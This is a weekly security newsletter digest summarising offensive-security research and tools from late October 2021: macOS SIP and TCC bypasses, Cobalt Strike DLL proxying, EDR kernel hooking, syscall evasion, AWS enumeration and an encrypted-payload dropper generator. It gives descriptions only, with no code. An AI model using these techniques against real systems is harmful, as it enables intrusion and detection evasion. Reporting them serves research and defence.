Last Week in Security (LWiS) - 2021-11-01

DLL proxying with artifact kit (@joevest), lateral movement 101 (@_RastaMouse), Windows kernel driver hooking (@cerbersec), macOS XAR arbitrary file write (@buffaloverflow), launch (@mrd0x), protobuf in sqlmap (@APTortellini), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-10-26 to 2021-11-01.



  • Neat SIP bypass for macOS. system_installd executes a zsh shell and has an entitlement to bypass SIP. Microsoft found a way to leverage this to run commands with the same entitlement with /etc/zshenv. How many more ways are there? Full Microsoft post: Shrootless.
  • Create a proxy DLL with artifact kit. DLL proxying is a great way to persist and in some cases elevate privileges. This post shows how to use the official artifact kit to turn a Cobalt Strike DLL into a "function proxy."
  • Lateral Movement 101. The old favorites are here, but perhaps there are details you've missed? Rasta also dropped new C# related projects today: D/Invoke Baguette.
  • Kernel Karnage – Part 2 (Back to Basics). EDRs are moving to the kernel, and drivers can provide great local privilege escalation opportunities. This post explores the ability to hook other driver's (EDR) functions. Want to start debugging the windows kernel? This 101 post was released yesterday.
  • Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833). These types of archive extraction arbitrary file writes can be great for phishing and even local privilege escalation (if a program accepts an archive and extracts it at a higher privilege level). Fixed in 12.0.1.
  • CVE-2021-30920 - CVE-2021-1784 strikes back - TCC bypass via mounting. macOS 12 has a regression that allows users to mount over ~/Library and this the TCC database. Yikes! Fixed in 12.0.1.
  • Tortellini in Brodobuf. Serializing data just adds a layer of unpacking, not security. This post goes from manual decode and exploitation proof to writing a sqlmap tamper script to automate it.
  • Understanding SysCalls Manipulation. Direct syscalls have been around for a while, but this technique makes sure they jmp back to memory space of NTDLL.DLL to avoid suspicious of the kernel returning to program memory space it should't (i.e. the location of your direct syscall). Sneaky! PoC here.

Tools and Exploits

  • quiet-riot is an enumeration tool for scalable, unauthenticated validation of AWS principals; including AWS Acccount IDs, root e-mail addresses, users, and roles. Check out the blog post here.
  • DInvoke is a library to dynamically invoke arbitrary unmanaged code from managed code without P/Invoke. Fork of D/Invoke by TheWover, but refactored to .NET Standard 2.0 and split into individual NuGet packages.
  • Metsubushi is a Go project to generate droppers with encrypted payloads automatically.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • melting-cobalt scans for Cobalt Strike teamservers, grabs beacons that allow staging, and stores their configs. No reason to leave staging enabled these days...
  • dockerized-android is a container-based framework to enable the integration of mobile components in security training platforms.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.